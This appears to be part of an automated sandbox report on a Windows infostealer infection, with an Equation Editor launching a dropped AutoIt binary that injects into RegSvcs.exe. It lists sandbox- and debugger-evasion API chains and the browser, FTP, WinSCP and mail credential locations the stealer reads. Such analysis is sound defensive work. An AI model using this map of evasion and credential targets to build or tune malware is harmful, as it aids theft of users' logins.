                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_3-100568
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,12_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Roaming\OIU.exeAPI coverage: 4.3 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1912Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00C0DBBE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BDC2A2 FindFirstFileExW,3_2_00BDC2A2
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C168EE FindFirstFileW,FindClose,3_2_00C168EE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00C1698F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D076
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00C0D3A9
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C19642
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00C1979D
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00C19B2B
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00C15C97
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00BA42DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2302
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2085
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1EAA2 BlockInput,3_2_00C1EAA2
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BD2622
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,12_2_004019F0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00BA42DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352088E mov edx, dword ptr fs:[00000030h]2_2_0352088E
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC4CE8 mov eax, dword ptr fs:[00000030h]3_2_00BC4CE8
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00113500 mov eax, dword ptr fs:[00000030h]3_2_00113500
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00113560 mov eax, dword ptr fs:[00000030h]3_2_00113560
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00111ED0 mov eax, dword ptr fs:[00000030h]3_2_00111ED0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 5_2_001D3500 mov eax, dword ptr fs:[00000030h]5_2_001D3500
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 5_2_001D1ED0 mov eax, dword ptr fs:[00000030h]5_2_001D1ED0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 5_2_001D3560 mov eax, dword ptr fs:[00000030h]5_2_001D3560
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 7_2_00153500 mov eax, dword ptr fs:[00000030h]7_2_00153500
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 7_2_00151ED0 mov eax, dword ptr fs:[00000030h]7_2_00151ED0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 7_2_00153560 mov eax, dword ptr fs:[00000030h]7_2_00153560
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 9_2_00213500 mov eax, dword ptr fs:[00000030h]9_2_00213500
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 9_2_00213560 mov eax, dword ptr fs:[00000030h]9_2_00213560
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 9_2_00211ED0 mov eax, dword ptr fs:[00000030h]9_2_00211ED0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h]11_2_00551ED0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 11_2_00553560 mov eax, dword ptr fs:[00000030h]11_2_00553560
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 11_2_00553500 mov eax, dword ptr fs:[00000030h]11_2_00553500
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00C00B62
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC09D5 SetUnhandledExceptionFilter,3_2_00BC09D5
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BD2622
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BC083F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00BC0C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004123F1 SetUnhandledExceptionFilter,12_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00C01201
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00BE2BA5
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0B226 SendInput,keybd_event,3_2_00C0B226
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,3_2_00C222DA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00C00B62
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00C01663
                  Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: OIU.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC0698 cpuid 3_2_00BC0698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,12_2_00417A20
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD333F GetSystemTimeAsFileTime,3_2_00BD333F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BFD27A GetUserNameW,3_2_00BFD27A
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BDB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_00BDB952
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00BA42DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: OIU.exeBinary or memory string: WIN_81
                  Source: OIU.exeBinary or memory string: WIN_XP
                  Source: OIU.exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: OIU.exeBinary or memory string: WIN_XPe
                  Source: OIU.exeBinary or memory string: WIN_VISTA
                  Source: OIU.exeBinary or memory string: WIN_7
